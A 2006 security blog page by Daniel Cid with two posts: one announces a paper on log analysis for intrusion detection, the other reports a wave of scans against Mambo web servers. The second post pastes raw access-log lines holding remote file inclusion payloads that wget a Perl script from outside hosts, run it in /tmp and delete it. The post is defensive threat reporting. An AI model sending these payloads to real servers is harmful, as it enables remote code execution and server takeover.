Month: May 2006

bookmark_borderLog analysis for intrusion detection

Posted on by Daniel Cid

I just released the document Log analysis for Intrusion Detection at the ossec web site. It shows how some threats can be detected by correlating specific patterns on web logs, proxy logs and authentication logs..”

Log analysis is one of the most overlooked aspects of intrusion detection. Nowadays we see every desktop with an anti-virus, companies with multiple firewalls and even simple end-users buying the latest security related tools. However, who is watching or monitoring all the information these tools generate? Or even worse, who is watching your web server, mail server or authentication logs?”

bookmark_borderHigh volume of web (mambo) scans.

Posted on by Daniel Cid

Since Thursday night I’m seeing a high volume of scans
on different web servers for possibly the following vulns:

http://secunia.com/advisories/14337/http://www.osvdb.org/displayvuln.php?osvdb_id=10180

However, they say the problem is on function.php and I’m seeing them on index.php. Can anyone confirm that?
Some log samples below..

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"

These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don’t do anything else, just
try to execute it and leave (without searching for
other paths)… Btw, I’m seeing these alerts from
ossec.